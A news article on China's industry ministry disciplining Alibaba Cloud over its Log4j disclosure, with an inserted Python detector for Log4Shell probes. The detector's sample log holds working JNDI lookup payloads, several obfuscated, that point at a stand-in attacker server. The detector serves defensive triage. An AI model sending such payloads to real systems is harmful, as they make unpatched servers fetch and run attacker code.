Since a critical flaw in Apache’s Log4j software was disclosed by an Alibaba Cloud engineer, cybersecurity professionals say they have seen an increase in scans for the vulnerability. Photo: Reuters

Apache Log4j bug: China’s industry ministry pulls support from Alibaba Cloud for not reporting flaw to government first

  • The Ministry of Industry and Information Technology said it will suspend work with Alibaba Cloud as a cybersecurity threat intelligence partner for six months
  • Notifying vendors first about security flaws is a cybersecurity industry norm, but a new law encourages Chinese companies to first notify the government
China’s internet security regulator has disciplined Alibaba Group Holding’s cloud computing services unit for failing to first report to the government a critical vulnerability in Apache’s Log4j software that has alarmed the cybersecurity community, Chinese media reported on Wednesday.

The Ministry of Industry and Information Technology (MIIT) is suspending work with Alibaba Cloud as a cybersecurity threat intelligence partner for six months because the company did not immediately report a severe bug in the widely used logging software to the government agency, the 21st Century Business Herald reported. The ministry also said it would reassess whether to resume the partnership at that time, based on measures Alibaba has taken to correct the problem.

Losing the support of the agency could affect business prospects for the cloud computing unit of Alibaba, the owner of the South China Morning Post. However, specific losses for the country’s largest cloud business are hard to determine.


The MIIT launched a cybersecurity threat intelligence sharing platform in December 2019 to serve as a state-led alliance in dealing with security threats. Membership in the platform is government recognition of the member’s capabilities in spotting and managing threats.

The MIIT did not publish a public statement about its decision, and Alibaba did not respond to a request for comment.

The Log4j vulnerability has been described as a “nightmare” and “catastrophic”, with some experts saying it is the most severe cybersecurity threat ever by number of devices affected. The Java logging library can be found in countless internet-connected devices, from Internet-of-Things products like televisions and cameras to the servers running cloud operations for tech giants like Amazon, Google and Microsoft.


The flaw first received widespread attention when it was publicly disclosed on December 9, after Alibaba Cloud Security Team engineer Chen Zhoujun discovered the flaw. Chen notified the Apache Software Foundation, the non-profit corporation that develops the open-source Log4j tool, by email on November 24.

According to a regulation passed this year, Chinese companies are obliged to report vulnerabilities in their own software to the MIIT through its National Vulnerability Database website. However, the Internet Product Security Loophole Management Regulation, which went into effect in September, only “encourages” companies to report bugs found in others’ software.


The MIIT cybersecurity management bureau released a statement on December 9 saying it was notified about the vulnerability by “relevant” cybersecurity institutions. The ministry summoned Alibaba Cloud and other cybersecurity firms to discuss the situation, it said. It also urged companies and the public to monitor for updates to patch their systems.

Cybersecurity industry norms encourage notifying vendors of security flaws first, giving them ample time to address the problem, before disclosing the issue to the public. Apache released a patch for the Log4j bug on December 6, three days before public disclosure.

Still, the bug’s impact is expected to be wide-ranging because of Log4j’s ubiquity. Many operators may not even be aware that their systems include the library, let alone that they have been compromised.


The vulnerability, known as Log4Shell, allows attackers to execute code remotely by getting a specially crafted string logged by the software: Log4j treats part of the logged text as a lookup and fetches attacker-controlled code from a server the attacker names. This became a problem in the Java edition of Microsoft’s game Minecraft, for example, where players could compromise other players’ systems by sending the malicious string through chat messages.
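The practical consequence of “code execution by getting a string logged” is that any field an attacker controls and a server logs (User-Agent, path, chat message) is an attack surface, and the probe string is easy to disguise using Log4j’s own lookup syntax. The following detector is an added example, not code from the article or from Alibaba Cloud or Apache; it unwraps the common obfuscations of the `${jndi:...}` trigger and flags matching lines in a constructed web access log. The log lines and IP addresses are made up for illustration.

```python
"""Find Log4Shell (CVE-2021-44228) probe strings in log lines.

Attackers hide the trigger with Log4j's own lookup syntax, e.g.
${${lower:j}ndi:ldap://...} or ${${::-j}${::-n}${::-d}${::-i}:...},
so a plain grep for "${jndi:" misses most real-world probes.
normalize() collapses those inner lookups to their literal value first.
"""
import re

# Inner lookups that collapse to a literal value:
#   ${lower:X} / ${upper:X}  -> X
#   ${anything:-X}           -> X   (default-value syntax; "anything" may be empty, as in ${::-j})
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

# The trigger once unwrapped: ${jndi:<scheme>:...}, e.g. ldap, ldaps, rmi, dns.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 20) -> str:
    """Repeatedly resolve innermost lower/upper/default lookups until stable."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_log4shell(lines):
    """Return (line_number, scheme) for every line carrying a JNDI lookup trigger."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = _JNDI.search(normalize(line))
        if match:
            hits.append((number, match.group(1).lower()))
    return hits


# Constructed sample access log (Apache combined format); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:03:15:01 +0000] "GET /login HTTP/1.1" 404 0 "-" "${${lower:j}ndi:${lower:rmi}://198.51.100.7:1099/x}"',
    '203.0.113.9 - - [10/Dec/2021:03:15:02 +0000] "GET /api HTTP/1.1" 200 77 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7/y}"',
    '203.0.113.9 - - [10/Dec/2021:03:15:03 +0000] "GET /api HTTP/1.1" 200 77 "-" "${${env:NaN:-j}ndi:dns://198.51.100.7/z}"',
    '198.51.100.2 - - [10/Dec/2021:03:16:00 +0000] "GET /docs/jndi HTTP/1.1" 200 9001 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for number, scheme in find_log4shell(SAMPLE_LOG):
        print(f"line {number}: Log4Shell probe via {scheme}")
```

The last sample line contains the word `jndi` in a URL path but carries no lookup, so it is not flagged; the three obfuscated variants are. Detection like this is useful for triaging who has been probing a fleet, not as a substitute for patching: new evasions appear regularly, and the only reliable fix is upgrading Log4j as Apache advised.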


Cybersecurity experts on Twitter have commended the Alibaba Cloud engineer for responsibly disclosing the vulnerability directly to the tool’s developers.

Since the bug’s public disclosure, cybersecurity experts have warned of an increase in scanning activity looking for vulnerable Log4j installations. Microsoft said on December 11 that it had found state actors connected with China, Iran, North Korea and Turkey both experimenting with and exploiting the vulnerability.
